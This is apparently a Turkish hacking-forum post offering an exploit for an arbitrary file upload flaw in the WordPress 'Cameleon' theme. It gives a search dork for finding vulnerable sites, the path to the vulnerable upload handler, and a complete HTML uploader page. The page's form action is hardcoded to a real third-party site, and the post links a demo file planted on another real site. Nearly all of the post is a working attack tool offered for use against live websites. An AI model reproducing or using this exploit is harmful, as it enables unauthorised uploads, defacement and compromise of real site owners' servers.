-
Dj_Taleh
Old User / Hack3r
Yenilere Gerekli olur 
Dork: inurl:/wp-content/themes/cameleon
Exploit: /wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
Daha Sonra Su Kodu bi site uzerinden yapa bilirsiniz
Demo: http://jhdlaw.com//wp-content//uploads//2019//12//index47.html
Dork: inurl:/wp-content/themes/cameleon
Exploit: /wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
Daha Sonra Su Kodu bi site uzerinden yapa bilirsiniz
Kod:
[/B]
[B]<title>CSRF Online</title>
<link href="https://spyhackerz.org/loogo.png" rel="icon" type="image/x-icon"/>
<link href="https://fonts.googleapis.com/css?family=Homenaje" rel="stylesheet" type="text/css">
<style>
body{
background-color: #000d2a;
background-image:url(https://spyhackerz.org/loogo.png);
background-size: cover;
background-attachment: fixed;
text-align: center;
font-face: homenaje;
}
.t3x {
border: 2px solid #02BC8C;
width: 550;
height: 35px;
padding-left: 5px;
margin: 10px auto;
resize: none;
background: transparent;
color: white;
font-family: 'homenaje';
font-size: 18px;
}
.ryuu {
border: 2px solid #02BC8C;
width: 120;
height: 30px;
padding-left: 5px;
margin: 10px auto;
resize: none;
background: transparent;
color: #02BC8C;
font-family: 'homenaje';
font-size: 18px;
}
.katsumi {
border: 2px solid #02BC8C;
width: 205;
height: 30px;
padding-left: 5px;
margin: 10px auto;
resize: none;
background: transparent;
color: #02BC8C;
font-family: 'homenaje';
font-size: 18px;
}
hr {
border : 2;
height : 2px;
}
</style>
<html>
<table width=100% height=50%>
<td align="center">
<font face="homenaje" size="20" color="#02BC8C">[+]</font><u><font face="homenaje" size="20" color="white">CSRF Online By Dj_Taleh</font></u><font face="homenaje" size="20" color="#02BC8C">[+]</u><br><br>
<form method="post">
<font size="4"><u>URL:</u><br></font><input type="text" class="t3x" name="url" placeholder="http://www.target.com/[path]/upload.php"><br>
<font size="4"><u>POST File:</u><br><input type="text" class="t3x" name="pf" placeholder="*Note: Filedata / files[] / qqfile / file / dzfiles / userfile /"><br>
<input type="submit" class="ryuu" name="d" value="Kunci Senpai!">
</form><form method='post' target='_blank' action='http://www.silvertrading.pe//wp-content/themes/cameleon/includes/fileuploader/upload_handler.php' enctype='multipart/form-data'><input type='file' class='katsumi' name='qqfile'><input class='ryuu' type='submit' name='g' value='UPLOAD!'></form></form>
</html><br><br>Demo: http://jhdlaw.com//wp-content//uploads//2019//12//index47.html
Moderatörün son düzenlenenleri:
